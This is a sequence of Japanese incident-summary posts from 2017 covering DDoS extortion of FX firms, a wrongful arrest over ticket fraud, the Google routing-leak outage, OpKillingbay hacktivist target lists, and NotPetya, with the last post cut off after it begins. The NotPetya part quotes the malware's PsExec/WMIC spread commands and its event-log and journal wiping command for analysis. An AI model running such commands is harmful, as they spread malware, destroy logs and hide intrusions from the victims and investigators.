19FXデューカスコピー・ジャパン9月21日21時08分9月22日2時45分DDoS攻撃9月20日以降に発生したサイバー攻撃について
20FXインヴァスト証券9月22日8時40分頃9月22日9時20分頃決済代行業者へのDDoS攻撃Myページ復旧のお知らせ
【重要】Myページおよび即時入金サービス障害のご報告(続報)
21FXセントラル短資FX(1回目)9月22日9時3分9月22日9時12分DDoS攻撃【重要】DDoS攻撃により当社ウェブサイトにアクセスしづらくなっています
【重要】本日(9月22日)発生したサイバー攻撃について
22FXマネースクウェア・ジャパン9月22日10時6分9月22日12時35分DDoS攻撃【FX】ログイン障害への対応について
23FXセントラル短資FX(2回目)9月22日18時20分9月22日19時00分頃DDoS攻撃【重要】本日(9月22日)発生した2回目のサイバー攻撃について
【重要】DDoS攻撃への対応について
24FXデューカスコピー・ジャパン9月22日21時50分9月22日22時00分DDoS攻撃9月20日以降に発生したサイバー攻撃について
25仮想通貨ビットフライヤー(2回目)9月23日20時25分9月23日20時56分−(記載無し)Twitterでの報告
26アフィリエイトインタースペース9月25日10時4分頃9月25日11時56分頃DDoS攻撃【お詫び】障害発生のご報告と復旧のお知らせ

関連不明な脅迫メールの発生

DDoS攻撃の前に脅迫メールを受信した組織

DDoS攻撃の直前に脅迫メールを受け取っていた組織が複数存在していたことが判明。報道*1 *2で脅迫があったことが明らかにされた組織は次の通り。

脅迫を受けた組織脅迫を受けた時期脅迫の状況など
マネーパートナーズ9月14日9時過ぎ複数のアドレスで送られていた。
24時間以内に2BTCを要求する英文メールであった。
直後にDDoS攻撃が発生した。
15分間攻撃する、24時間以内に支払いがない場合、攻撃を再開するという内容。
24時間のリミット前に再度攻撃が発生した。
FXトレード・フィナンシャル9月16日午前中DDoS攻撃の数分前にマネーパートナーズと同様のメールを受信した。
ヒロセ通商9月18日脅迫メールを受信。
FX取引業者と契約している決済代行業者2017年9月21日8時前Armada Collectiveを名乗り、DDoS攻撃の予告、攻撃の停止と引き換えに金銭を要求するもの。
メール受信直後にDDoS攻撃が発生。
システム会社はドメイン名を変更する措置を取り、攻撃を回避。
Phantom Squadを自称する送信元

JPCERT/CCやSANSが9月19日頃より、「Phantom Squad」を名乗る送信元から脅迫(DoS攻撃の停止と引き換えに金銭を要求)するメールが届いているとの情報が国内で確認されていると報告しています。JPCERT/CCによればこの脅迫メールと今回確認されているDoS攻撃との関連は不明とのこと。

関連Tweet

テックビューロ
FXFT
JFX
ヒロセ通商
ビットフライヤー
外為どっとコム
上田ハーロー
コムテックス
BTCボックス

更新履歴

*1ネット金融狙うDDoS攻撃が続く、脅迫型による被害も明らか,ITpro,2017年9月25日アクセス

*2FX業者にサイバー攻撃、直前に予告し金銭要求,読売新聞,2017年9月25日アクセス

徳島県警察の誤認逮捕事件についてまとめてみた

2017年9月10日、チケット売買を巡り、徳島県警察(三好署)により詐欺容疑で女性Aが逮捕、勾留されていた事件について、別人(女子中学生B)によるなりすましの犯行であり、女性Aは誤認逮捕であったと報道されました。ここでは関連情報をまとめます。

インシデントタイムライン

日時出来事
2016年8月頃女性AがTwitter上にチケット売買を書き込み。
2016年8月17日女子中学生BがAになりすましてC、Dと架空の売買契約。
その後徳島県内の女子高生C、Dがチケット代として計8万円を振り込み。
2016年9月チケットが届かなかったとして女子高生Cが被害届を徳島県警察三好署へ提出。
女性A逮捕直前徳島県警察が女性Aの自宅を家宅捜索。
2017年5月15日現金をだまし取ったとして女性Aが詐欺容疑として徳島県警察により逮捕。同月送検。*1
:(19日間)女性Aを勾留。
2017年6月2日徳島地検が女性Aを処分保留で釈放。
2017年6月7日女性Aが徳島地検にチケット送付の証明書を提出。
2017年8月下旬徳島県警察が女子中学生Bの存在を把握。
2017年9月10日徳島県警察が女性Aを誤認逮捕していたと報道
同日 13時半頃徳島県警察 三好署幹部が女性A宅を訪問し謝罪
2017年9月11日徳島県警察が詐欺の疑いとして女子中学生Bを書類送検、及び女性Aの誤認逮捕について発表。
2017年9月27日徳島地検が女性Aへ電話で謝罪
同日徳島地検が女子中学生Bを詐欺の非行事実で徳島家裁送致。*2

事案概要

f:id:Kango:20170911234327p:image:w640

登場人物
愛知県女性A 21歳Bのなりすましによる詐欺容疑で誤って逮捕、送検され19日間勾留された。その後処分保留で釈放。
京都市女子中学生B 15歳チケット売買を通じAのなりすましを行い、現金6万1880円を受領した疑い。A釈放後の捜査により、存在を把握され詐欺容疑で書類送検。
徳島県内の女子高生C 10代Aの投稿を見て購入を希望した一人。AになりすましたBと架空の売買契約を行い、Aの口座へ4万円を振り込みした。その後チケットが届かないとして徳島県警察へ被害相談。
和歌山県内の女性D 10代Aの投稿を見て購入を希望した一人。AになりすましたBと架空の売買契約を行い、Aの口座へ4万円を振り込みした。
関東の女性E 20代Bが売買サイトにA名義で出品したチケットを6万5千円で落札した。

逮捕後の状況(女性Aの勾留)

釈放後の状況(徳島県警察の再捜査)
徳島県警察から女性Aへ謝罪

徳島県警察が女性Aを誤認逮捕した理由

記者会見やその後の取材を通じ、誤認逮捕となった理由について西岡署長らが次の通り回答した。

発表まで時間を要した理由について次の通り回答した。

女性Aが行ったチケットの送付
女性Aの銀行口座
女性AになりすましていたTwitterアカウント

徳島地検が起訴しなかった理由

徳島地検の町田聡次席検事が理由を説明。

また、徳島地検は女子中学生Bの処分が決まり次第、女性Aへの謝罪等の対応について適切に行うとコメントした。

なりすましを行っていた女子中学生B

更新履歴

*1女性を誤認逮捕 その後釈放,NHK,2017年9月11日アクセス

*2チケット転売で誤認逮捕の女性不起訴 徳島地検謝罪,徳島新聞,2017年9月28日アクセス

*3:誤認逮捕発覚を受け、報道各社は実名個所や記事自体の削除を行っている模様。

*4徳島・三好署が誤認逮捕謝罪 19日間勾留された専門学校生宅訪れ,徳島新聞,2017年9月11日アクセス

*5徳島県警が21歳女性を誤認逮捕、19日間勾留 「公演チケット売る」と女性に成り済ました女子中生を書類送検,産経ニュース,2017年9月11日アクセス

*6徳島県警、21歳女性を誤認逮捕…詐欺容疑で19日間勾留,SANSPO.com,2017年9月11日アクセス

*7徳島・三好署が誤認逮捕 詐欺容疑の専門学校生 成り済まし被害,徳島新聞,2017年9月11日アクセス

*8:徳島県警 詐欺誤認逮捕 勾留19日 21歳女性 SNSなりすまされ,読売新聞,2017年9月11日夕刊

*9中3女子、警察をも欺く手の込んだ偽装工作 被害女性はチケット配送記録で潔白証明,産経ニュース,2017年9月11日アクセス

*10チケット詐欺で誤認逮捕=21歳女性を19日間勾留−徳島県警,時事通信,2017年9月11日アクセス

*119月12日付 三好署誤認逮捕  成り済まし見抜くすべは,徳島新聞,2017年9月12日アクセス

*12なりすまし誤認逮捕、「ネット犯罪の知識不足」,読売新聞,2017年9月12日アクセス

*13チケットの送付先を調べず、専門学校生を逮捕,産経ニュース,2017年9月12日アクセス

*14なおざりな捜査が誤認逮捕招く 徳島・チケット詐欺,徳島新聞,2017年9月12日アクセス

8月25日に発生した大規模通信障害をまとめてみた

2017年8月25日12時過ぎより、Webサイトにつながらない等の接続障害とみられる事象が複数発生しました。また同時間帯にNTTコミュニケーションズ、KDDIから障害報告が発表されています。ここでは関連情報をまとめます。

インシデントタイムライン

日時出来事
8月25日 正午過ぎGoogleが誤った経路情報を送信。
〃 12時22分NTTコミュニケーションズのOCNバックボーンで通信障害発生。
〃 12時24分KDDIのサービスで通信障害発生。
〃 以降日本国内の複数のサービス等で接続障害が発生。
〃 送信後8分以内Googleが誤設定情報を修正。
〃 12時39分KDDIの通信障害が復旧。
〃 12時45分NTTコミュニケーションズの通信障害が復旧。
〃 夕方頃各組織で発生した障害が概ね復旧。
8月26日Googleが誤設定を認め、謝罪する声明を発表。
8月29日総務大臣が障害減の詳細調査を行う意向を表明。*1

障害が発生していた/していたと見られるWebサイト、サービス等

8月25日12時過ぎに障害発生の発表や報道されていたものは次の通りです。

Webサイト/サービス発生時間復旧時間障害内容案内
三重県午後から復旧済?入札サイトが利用しづらい状況報道(NHK)
徳島市12時30分頃14時過ぎWebサイトが閲覧できない事象通信ネットワーク障害による徳島市ホームページの利用について(お詫び)
JR東日本12時半過ぎモバイルSuica、Webサイトにつながりにくい状態Webサイト掲載
楽天証券12時34分(報告)復旧済ログインしづらい状況現在ログインしづらい状況が発生しています (8.25 12:34)
GMOクリック証券12時41分(報告)15時46分ログインしづらい状況2017年08月25日発生 当社取引システム動作確認のお知らせ
SBI証券不明復旧済?断続的にアクセスしづらい状況報道(ZDNetJapan)
じぶん銀行12時24分頃15時28分頃ログインできない事象【お詫び】ログインができない事象について
【お詫び】ログインができなかった事象について(復旧済)
ジャパンネット銀行正午過ぎ(復旧済)ログインしづらい状況ホームページへログインしづらい事象について
りそな銀行12時半頃15時過ぎログインしづらい状況「マイゲート」つながりにくい事象は解消しました
埼玉りそな銀行12時半頃15時過ぎログインしづらい状況「マイゲート」つながりにくい事象は解消しました
近畿大阪銀行12時半頃15時過ぎログインしづらい状況「マイゲート」つながりにくい事象は解消しました
情報処理推進機構14時51分(報告)Webサイトが閲覧しにくい状態Tweet(障害報)
LINE12時半頃14時頃一部のサービスが不安定報道(産経)
さくらインターネット12時25分17時25分複数の上位回線キャリアによる障害障害発生のお知らせ
Ameba12時20分頃13時11分(報告)Amebaのサービス全般が利用しづらい状況【障害報告】アメーバピグおよびピグゲームが利用しづらい状況について
ワコール12時過ぎサイトアクセス不可、メール受信不可が一部で発生サイトのアクセスに関するお詫び
アイビューティーストア12時30分頃16時15分頃コンビニ支払いシステムにエラーが発生コンビニ決済不具合につきお詫び申し上げます
コンビニ支払い復旧のお知らせ
任天堂12時25分頃17時30分頃サービス提供ができない状態一部ソフトのオンラインプレイ
アトレ大井町16時10分(報告)復旧済?Suica/PASMOが利用できない状況Tweet(障害報)
Tweet(復旧報?)
信州スカイパーク12時頃16時頃Webサイトに大変つながりづらい状況【お詫び】通信障害について
日本自然保護協会不明復旧済Webサイトが表示できない状況当会ウェブサイトの不具合のお知らせとお詫び
関西福祉科学大学12時30分頃16時20分頃Webサイトにつながりづらい状況本学ホームページが閲覧できなくなっていた件について(お詫び)
Pasco正午過ぎ15時頃Webサイトが閲覧できない事象弊社ホームページのアクセス障害についてのお詫び
PlayStation Network12時16時サインインできない可能性”PlayStation Network”に関するご案内
ララビット15時23分(報告)利用しづらい状態Tweet(障害報)
NEXON12時28分15時50分接続不可、不安定となる事象【一般】【NEXON】接続障害発生のお知らせ【8/25 17:24追記】
[8/25]インターネット回線障害発生のお知らせ【復旧】
パズル&ドラゴンズ(ガンホー)15時40分(報告)ゲームへ接続し辛い状況【パズル&ドラゴンズ】一部環境下での接続障害について
ガンファイア14時57分(報告)21時19分ログインができない事象Tweet(障害報)
Tweet(復旧報)
SINoALICE12時25分頃ゲームに接続しづらい状況Tweet(障害報)
クラッシュロワイヤル13時27分(報告)サービス全般への通信障害Tweet(障害報)
モンスターストライク15時47分(報告)サービスにつながりにくい状況Tweet(障害報)
陰陽師17時39分(報告)サービスにつながりにくい状況Tweet(障害報)
ポケコロ12時頃サービスを安定的に提供できない状況、イベント順延Tweet(障害報)
Tweet(イベント順延案内)
オルタナティブガールズ18時54分(報告)接続し辛くなる現象Tweet(障害報)
ドラゴンクエスト10
(スクウェアエニックス)
16時16分18時21分サービスに正常に接続できない状況インターネット全体が不安定な状況について(8/25)
インターネット全体が不安定な状況について(8/25):続報
ファイナルファンタジー11
(スクウェアエニックス)
16時16分18時21分サービスに正常に接続できない状況インターネット全体が不安定な状況について(8/25)
インターネット全体が不安定な状況について(8/25):続報
ファイナルファンタジー14
(スクウェアエニックス)
16時16分18時21分サービスに正常に接続できない状況インターネット全体が不安定な状況について(8/25)
インターネット全体が不安定な状況について(8/25):続報
バンドリ! ガールズバンドパーティ!12時30分頃19時43分アプリが正常に動作しない状況Tweet(障害報)
Tweet(復旧報)
メルカリ13時10分頃14時40分頃正常なサービスが提供が出来ない状況【復旧済】上位ネットワーク障害によるサービス停止について
オタマート15時7分(報告)au回線で接続に失敗する事象Tweet(障害報)
マネーフォワード13時1分(報告)15時58分サービスにつながりにくい状況Tweet(障害報)
Tweet(復旧報)
ニコニコ動画12時頃16時半頃サービスに接続できない状況報道(日経)
DMM16時12分(報告)17時58分サービスにつながりにくい状況Tweet(障害報)
Tweet(復旧報)
刀剣乱舞(DMM)19時49分頃(報告)サービスにつながりにくい状況Tweet(障害報)
魔法使いと黒猫のウィズ15時18分(報告)19時9分サービスにつながりにくい状況Tweet(障害報)
Tweet(復旧報)
Adobe12時頃18時18分ダウンロード、ログイン等が不安定な状況Tweet(復旧報)

この他に次のサービスでも障害と見られる情報がSNS上に投稿されていた。

通信事業者による障害報告

通信事業者により2017年8月25日に報告された障害は次の通りです。

事業者障害発生時刻復旧時刻案内
NTTコミュニケーションズ(OCNバックボーン)2017年8月25日12時15分頃⇒後に22分頃に修正8月25日12時45分OCNバックボーン における一部通信不具合の発生・復旧について
【回復】OCN光等の一部通信不具合について
KDDI(インターネット・常時接続サービス)2017年8月25日12時24分8月25日12時39分一部お客様インターネット通信不安定

障害影響規模

JPNICや報道により確認されている範囲は次のもの。*2

概要件数
障害影響が及んだ範囲約10万経路
国内で影響が及んだ範囲約2万5千経路
Googleにより配信された誤経路情報の範囲約7万超経路

発生原因

発生サービス原因に係る言及
OCNバックボーン『海外の経路不安定事象により、通信の一部において断続的にご利用できない状況が発生』
『弊社OCN設備に異常は発生しておりませんでした』
KDDIインターネット・常時接続サービスインターネット上で大量の経路変動により通信不安定な状況』
『一部のお客様のインターネット通信不安定が継続しておりましたが、通信の安定化を図るための対処を行い、一部のお客様についても通信が安定』
『弊社の設備に異常は発生していない』

確認されている事象について

JPNICによれば今回の発生事象について、 *5

スクウェアエニックスが公開した情報には正に同じような状況が説明されている。

この影響により、バックボーンルーター(ISP間など上位ネットワークで通信を行う装置)が、全体的に高負荷な状況に陥り、結果として16:16頃、弊社サーバー群と繋がるバックボーンルーターの一部が停止いたしました。このことで、通信経路や通信先によっては、弊社サーバー群への正常な通信ができなくなる状況となりました。

http://hiroba.dqx.jp/sc/news/detail/a495eebbfa243b79c5b9b224c482d0c2/
「AS 15169」はGoogleに割り当てられた番号
参考情報

通信障害に乗じた悪質行為

更新履歴

*1野田聖子総務相、ネット障害原因を詳細調査を表明 再発防止狙い,産経ニュース,2017年8月29日アクセス

*2今日の大規模通信障害、原因は経路障害、世界10万のIPアドレスに影響,InternetWatch,2017年8月25日アクセス

*3NTTコミュニケーションズ、通信障害「第三者による攻撃ではない」 ,日本経済新聞,2017年8月26日アクセス

*4グーグル引き金? 大規模ネット障害、装置で誤配信か,朝日新聞,2017年8月27日アクセス

*5[続報]OCNの通信障害、米グーグルによる誤った経路情報の大量送信が原因か,ITpro,2017年8月25日アクセス

*6米グーグルの設定ミス、なぜ日本の大規模ネット障害を引き起こしたのか?,ITpro,2017年8月28日アクセス

2017年の海洋動物保護のオペレーションに係る動きについてまとめてみた

毎年9月のイルカ漁解禁とタイミングをかぶせて開始されているOpKillingbayの他、OpWhalesやOpSeaworldなどの海洋動物保護関係のオペレーションについて日本を対象とした2017年の動きについてまとめます。(動きあり次第適宜更新します。)

ターゲットリスト(OpKillingbay)

次は2017年のオペレーションの対象として公開されたリストを元に組織名やドメインを記載したものです。

No組織名ドメイン
1参議院www.sangiin.go.jp
2衆議院www.shugiin.go.jp
3厚生労働省www.mhlw.go.jp
4総務省www.soumu.go.jp
5自由民主党www.jimin.jp (HTTPS表記)
6日本政府観光局www.jnto.go.jp
7在ポルトガル日本大使館www.pt.emb-japan.go.jp
8首相官邸www.kantei.go.jp
9国際交流基金www.jpf.go.jp
10外務省www.mofa.go.jp
11環境省www.env.go.jp
12総務省統計局www.stat.go.jp
13内閣府www.cao.go.jp
14金融庁www.fsa.go.jp
15警察庁www.npa.go.jp
16法務省www.moj.go.jp
17経済産業省www.mext.go.jp
18裁判所www.courts.go.jp
19The Official Wakayama Travel Guideen.visitwakayama.jp (HTTPS表記)
20和歌山県警察www.police.pref.wakayama.lg.jp
21南海フェリーwww.nankai-ferry.co.jp
22和歌山バスwww.wakayamabus.co.jp
23南海電鉄www.nankai.co.jp
24NHKwww.nhk.or.jp
25キョクヨーwww.kyokuyo.co.jp
26農林水産省www.maff.go.jp
27ザ・築地市場www.tsukiji-market.or.jp
28高野町www.town.koya.wakayama.jp
29九度山町www.town.kudoyama.wakayama.jp
30かつらぎ町www.town.katsuragi.wakayama.jp
31橋本市www.city.hashimoto.wakayama.jp
32紀の川市www.city.kinokawa.lg.jp
33岩出市www.city.iwade.lg.jp
34紀美野町www.town.kimino.wakayama.jp

ターゲットリスト(OpWhales)

次のサイトにまとめられています。

攻撃示唆に係る投稿と観測情報

このオペレーションの活動として行われている攻撃示唆に係る投稿と観測情報です。

DoS攻撃とみられるTwitter上への攻撃示唆投稿 (随時更新)
No攻撃示唆投稿日時対象URL関連オペレーションリスト掲載の有無piyokangoによる接続障害観測情報投稿元アカウント
12017/09/06 06:20izu-sakuraya.jp
(ペンション桜家)
OpKillingbay、OpWhales無し観測対象外TMTredux
22017/09/08 07:44www.wakayama-kanko.or.jp
(わかやま観光情報)
OpKillingbay、OpWhales無し2017/09/08 07:35〜2017/09/08 08:38 (約1時間)TMTredux
32017/09/09 04:47www.city.kainan.wakayama.jp
(海南市)
OpKillingbay、OpWhales無し2017/09/09 04:31〜2017/09/09 04:58 (約30分)TMTredux
42017/09/26 02:1927.116.29.237:80
(わかやま観光情報のIPアドレス)
OpKillingbay無し2017/09/26 02:16頃に瞬間的な接続障害を観測lucian_342
52017/10/01 13:51www.nankai-ferry.co.jp
(南海フェリー)
OpKillingbay有り観測対象外ahmed9104859348
62017/10/01 13:51www.wakayamabus.co.jp
(和歌山バス)
OpKillingbay有り観測対象外ahmed9104859348
72017/10/01 14:04www.tsukiji-market.or.jp
(ザ・築地市場)
OpKkillingbay有り2017/10/01 14:02〜2017/10/01 14:09 (約10分)ahmed9104859348
82017/10/01 14:08www.city.hashimoto.wakayama.jp
(橋本市)
OpKillingbay有り2017/10/01 14:15〜2017/10/01 14:27 (約15分)ahmed9104859348
92017/10/01 14:11www.city.kinokawa.lg.jp
(紀の川市)
OpKillingbay有り障害観測されずahmed9104859348

更新履歴

ウクライナ、ロシア等で感染が確認されたとみられるランサムウェア「NotPetya」についてまとめてみた

2017年6月27日頃からウクライナ、ロシアの他、世界中でサイバー攻撃が発生したと現地メディア等により報じられています。各地で確認されたサイバー攻撃はランサムウェアによる影響を受けたものとみられています。ここでは関連情報をまとめます。

注意喚起等

インシデントタイムライン

NotPetya、ウクライナ、M.E.docの動きをまとめると次の通り。

日時出来事
2017年4月14日M.E.docがアップデート(10.01.175-10.01.176)。アップデートファイルにバックドアが混入していた恐れ。
2017年5月15日M.E.docがアップデート(10.01.180-10.01.181)。アップデートファイルにバックドアが混入していた恐れ。
2017年5月17日何者かにより別のランサムウェア「XData」がM.E.docのサーバーを通じて拡散された。
2017年5月31日M.E.docのサーバーにPHPのWebShellが設置された可能性。
2017年6月22日M.E.docがアップデート(10.01.188-10.01.189)。アップデートファイルにバックドアが混入していた恐れ。
2017年6月26日WannaCryに類似したランサムウェア「FakeCry」がM.E.docのサーバーを通じて拡散された。
2017年6月27日M.E.docのサーバーの管理者権限が何者かにより奪取される。
同日ウクライナ、ロシアを中心に世界各地でNotPetyaに感染し被害を受ける報告が多数。
2017年6月28日ウクライナ警察がM.E.doc経由で感染が広まった可能性があると報告。
2017年7月1日ウクライナ保安庁がNotPetyaに関連する攻撃にロシア政府が関与したと発表。
2017年7月4日ウクライナ保安庁がM.E.doc開発会社のサーバーを差し押さえ
同日ランサムウェアの振込先アドレスからこれまで振り込まれていたBitcoinが移動される。
同日NotPetyaで暗号化されたファイルの復号鍵を100Bitcoin支払えば公開する等とテキストサイトに掲載された。
同日掲載文で示されていたチャットルーム上でMotherboardの記者がハッカーの一人と接触し、試験的に暗号化されたファイルの復号に成功したことを確認した。

確認されているマルウェア「NotPetya」

今回のマルウェアは過去に確認されていたNotPetyaとコードや挙動が似ていることから、そのまま、あるいは似た名前で呼ばれている。*1 一連の攻撃の詳細や被害の実態が明らかになってきたことから、ランサムウェアとは異なったもの(ワイパー)であると評価する組織もおり「Not」や別名で呼ぶ動きがある。

今回確認されているマルウェア呼称の一覧

NotPetyaに関連する呼称

バックドアに関連する呼称

NotPetyaの感染対象
復号ツール

1.初期の感染経路

次の2つの感染経路に係る情報が出回っていたが、その後の調査によりM.E.doc経由によるものが有力とみられている。

メール経由の攻撃に係る情報
M.E.docの更新機能経由の攻撃に係る情報

M.E.docに係る基本情報

M.E.docのFacebook上で関連情報が投稿されている。

富士通UKがM.E.docのサーバーに対してPortScan等を行った結果を公開している。

WebShellが稼働していた可能性

ウクライナ国内のWebサイトを通じた水飲み場型攻撃に係る情報

2.ランサムウェアの機能

実行から暗号されるまでの流れは次の通り。

rundll32 "NotPetya本体", #1

内包されたリソース

次の4つのリソースが存在し、Zlibにより圧縮されている。

暗号対象の拡張子

.3ds,.7z,.accdb,.ai,.asp,.aspx,.avhd,.back,.bak,.c,.cfg,.conf,.cpp,.cs,.ctl,

.dbf,.disk,.djvu,.doc,.docx,.dwg,.eml,.fdb,.gz,.h,.hdd,.kdbx,.mail,.mdb,.msg,

.nrg,.ora,.ost,.ova,.ovf,.pdf,.php,.pmf,.ppt,.pptx,.pst,.pvi,.py,.pyc,.rar,.rtf,

.sln,.sql,.tar,.vbox,.vbs,.vcb,.vdi,.vfd,.vmc,.vmdk,.vmsd,.vmx,.vsdx,.vsv,.work,.xls,.xlsx,.xvd,.zip

https://blog.comae.io/byata-enhanced-wannacry-a3ddd6c8dabb
暗号化方式
身代金のやり取り

停止されたメールアドレスの他に連絡先が存在するとの情報がある。

3.ワームの機能

拡散方法

確認されている拡散方法は次の通り。

実行優先順位名前概要
PsExecによる拡散現在のユーザーのWindowsトークンを使用して特定のコマンドを実行する。$admin共有を探査。マルウェア自身のコピーをネットワーク上で実行。新しくコピーしたマルウェアをPsExecを使用してリモート実行する。
WMIによる拡散現在のユーザーのトークン(既に接続している場合)、またはユーザー名、パスワードを使用して特定のコマンドを実行する。
ETERNALBLUE /EternalRomanceによる拡散WannaCry等で用いられていたETERNALBLUE Exploitを使用する。ETERNALROMANCE (CVE-2017-0145)も使用する。
実行されるコマンド

PsExec、WMIで実行されるコマンドは次の通り。

C:\WINDOWS\dllhost.dat \\w.x.y.z -accepteula -s -d C:\Windows\System32\rundll32.exe C:\Windows\perfc.dat,#1

http://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html

Wbem\wmic.exe /node:"w.x.y.z" /user:"username" /password:"password" "process call create "C:\Windows\System32\rundll32.exe \"C:\Windows\perfc.dat\" #1"

http://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html

4. その他の機能、関連情報

ログ削除機能

wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D %c:v

削除されるイベントログ等は次の5つ。

感染を防ぐ手段

関連ツイート

5.バックドアの関連情報

次の情報を窃取する。

6. 報道、報告されている被害の状況

サイバー攻撃を受けたとして報道や情報が出ている組織は次の通り。但し、これらが全て同じランサムウェアによるものかは不明。

ウクライナ

ウクライナで影響が出たと名前が出ている個所は次の通り。

政府・自治体・ウクライナ政府、エネルギー・石油産業省、総務省:Webサイトで接続障害発生。
キエフ市役所
金融・ウクライナ中央銀行:国内の金融機関で感染事例を確認。問題はその後すぐに対応されたとの見解。
・Oschadbank
・Sberbank
・TASKomertsbank
・Ukrgasbank
・Pivdenny
・OTP Bank
・Kredobank
交通Boryspil国際空港:電光掲示板等で障害発生。28日もチェックイン、離着陸表示等手動対応。*4
・キエフ地下鉄*5
・ウクライナ鉄道
放送・Era-FM
・Football.ua
・STB
・TV Channel 24
・Radio Lux
・Radio Maximum
・KP in Ukraine
・TV channel ATR
・Korrespondent.net
・Epicenter
・Arcelor Mittal
・Ukrposhta
電力・Kyivenergo:電力供給への影響は生じていない模様。
・Dniproenergo
・Zaporizhyaoblenergo
・チェルノブイリ原子力発電所:放射線自動監視システムの一部が停止したため手動切り替え。*6
流通・スーパー Kharkov*7:支払いに銀行カードが利用できなくなった。*8
他大手・航空機製造 Antonov
・Nova Poshta:ネットワーク内で感染が確認された後サービスが停止した。*9
・Naftogaz Ukraine DTEK
・Kyivvodocanal
・Novus
・Ukrposhta
通信・Ukrtelecom
・Lifecell
・Kyivstar
・Vodafone Ukraine
医療・Farmak
・Boris clinic
・Feofania Hospital Corporation Arterium
ガソリンスタンド・WOG
・Klo
・TNK
その他

ウクライナ以外でも被害や影響を受けたと情報が出ている。

ロシア国営石油 Rosnoft:生産工程管理を予備システムへ切り替え石油生産への影響なし。*10
石油中堅 Bashneft:Webサイトで接続障害発生
政府系ネットワークがダウン。
鉄鋼メーカー Evraz:ITシステムが被害を受けたが生産量への影響無し。
デンマーク海運 A.P.モラー・マースク:顧客がオンライン予約不可。社内システムも停止。*11
アメリカ製薬 Merck*12 *13
法律事務所 DLA Piper ワシントンDC事務所*14
Heritage Valley Health System *15
イギリス広告代理店 WPP *16Webサイトで接続障害が発生。従業員向けに無線LAN利用禁止の指示。
Cadbury:オーストラリア タスマニア州のチョコレート工場に影響が及んだ。*17 *18 *19
Sea Containers
フランス建材メーカー Saint-Gobain:ITシステムが攻撃を受けた。*20
フランス国鉄 SNCF:運行業務への影響なし。
小売 Auchan Group:ウクライナの子会社の決済端末が攻撃を受けた。店舗閉鎖などはしていない。
金融 BNPパリバ:不動産関連子会社が影響を受けていることを確認した。
フランス政府:攻撃を受けたが実害はなかった。*21
ドイツBeiersdorf:IT、電話システムが攻撃を受けた。ハンブルグの本社の他、世界中の関連会社も影響を受けた。
オランダ船会社 TNT:一部システムに影響が及び修復が必要。
スペイン食品 Mondelez:世界的にIT関連機能が停止しているとの声明。*22
インドジャワハルラール・ネルー港湾信託:ターミナルで積み出し、積み入れが不可。Maerskの施設の1つ。*23 *24
オランダAPMターミナル(Maersk所有):運営する17のターミナル(ニューヨーク、ニュージャージー、ロッテルダム等)で障害。一部港は27日終日の閉鎖。 *25 *26
ノルウェー詳細不明 *27
アルゼンチンロサリオ港:穀物ターミナルで一部配送停止。*28

この他に次の国で攻撃の影響を受けた可能性がある。

同時期に発生したカンタス航空の予約システム(Amadeus)障害はNotPetyaとは関係がないことが確認されている。*29

感染被害測定の状況

今回のマルウェアはランサムウェアか

一部のベンダ(Kaspersky等)は今回のマルウェアはランサムウェアではなく、ワイパーの可能性があると指摘している。

Kasperskyがあげている理由

被害報告の関連ツイート

メール経由の攻撃を修正したベンダ

While research is ongoing at this stage of the investigation, we can verify at this point that the ransomware exhibits worm-like (ransomworm) behavior due to its active probe for an SMB server, and that it appears to be spreading through EternalBlue and WMIC. Researchers initially believed that the Petya/NotPetya ransomworm was transmitted to its first victims through emails containing infected Microsoft Office documents that exploited CVE-2017-0199. While we are still working to confirm this, applying the appropriate MS Office patch to your system(s) will protect you from this attack vector.

各国・関連組織の動き

アメリカ
ウクライナ
ロシア
EUROPOL

分析レポート

検体関連情報

検体サンプル
通信先と見られるIPアドレス

次の通信先に接続しているとの情報があります。

ランサムウェアの取引先アドレス

更新履歴

*1:ここでも「NotPetya」として記述しています。

*2https://twitter.com/dellcam/status/879744405040771072

*3露企業など80以上ウイルス感染…サイバー攻撃,読売新聞,2017年6月28日アクセス

*4サイバー攻撃の被害、ウクライナが最大か 過去にも標的,朝日新聞,2017年6月29日アクセス

*5https://twitter.com/kyivmetroalerts/status/879670749149245440

*6大規模サイバー攻撃、チェルノブイリ原発も被害,日本経済新聞,2017年6月28日アクセス

*7https://twitter.com/golub/status/879707965179088896

*8欧米で再び大規模なサイバー攻撃 ウイルス注意呼びかけ,NHK,2017年6月28日アクセス

*9https://www.facebook.com/nova.poshta.official/photos/a.409208275835344.96865.405543306201841/1392073604215468/?type=3

*10再び大規模サイバー攻撃、欧米企業など被害 先月の攻撃と類似も,Reuters,2017年6月28日アクセス

*11https://twitter.com/Maersk/status/879689865184636928

*12https://twitter.com/JackPosobiec/status/879734999196602369

*13https://twitter.com/Merck/status/879716775021170689

*14https://twitter.com/ericgeller/status/879738598244835328

*15Heritage Valley Health System Targeted In Global Cyber Attack,CBS,2017年6月28日アクセス

*16https://twitter.com/WPP/status/879813930901745664

*17Cyberattack Hits Ukraine Then Spreads Internationally,NewYorkTimes,2017年6月28日アクセス

*18Petya cyber attack: Cadbury chocolate factory in Tasmania hit by ransomware,ABC,2017年6月28日アクセス

*19https://twitter.com/LeonCompton/status/879825013439725568

*20https://twitter.com/AnimalDubz/status/879684389860454402

*21チェルノブイリ原発も被害,毎日新聞,2017年6月29日アクセス

*22大規模サイバー攻撃、米国に波及 メルクなど被害,日本経済新聞社,2017年6月28日アクセス

*23大規模サイバー攻撃がアジアに拡大、インドの港湾施設で被害,Bloomberg,2017年6月28日アクセス

*24https://twitter.com/mihirmodi/status/879678870471024640

*25https://twitter.com/OpiniePaultje/status/879680984219779072

*26https://twitter.com/PortNYNJ/status/879749788790435840

*27欧州各国に大規模サイバー攻撃 銀行・空港など被害,朝日新聞,2017年6月28日アクセス

*28欧米で新たな大規模サイバー攻撃−身代金要求型ウイルスが拡散,Bloomberg,2017年6月28日アクセス

*29Australian businesses warned as ‘unprecedented’ cyber attack hits Europe,news.com.au,2017年6月29日アクセス

*30ウクライナ“サイバー攻撃にロシア政府が関与”,NHK,2017年7月3日アクセス

*31大規模サイバー攻撃「ロシアが関与」 ウクライナ保安局,朝日新聞,2017年7月4日アクセス

国内初のランサムウェア作成事案と他に関連が疑われる作成物についてまとめてみた

2017年6月5日、神奈川県警は大阪府の男子生徒がランサムウェアを作成したとして不正指令電磁的記録作成などの容疑で逮捕したことを発表しました。ここではこの事案に関わる情報とそこから調べた結果をまとめます。

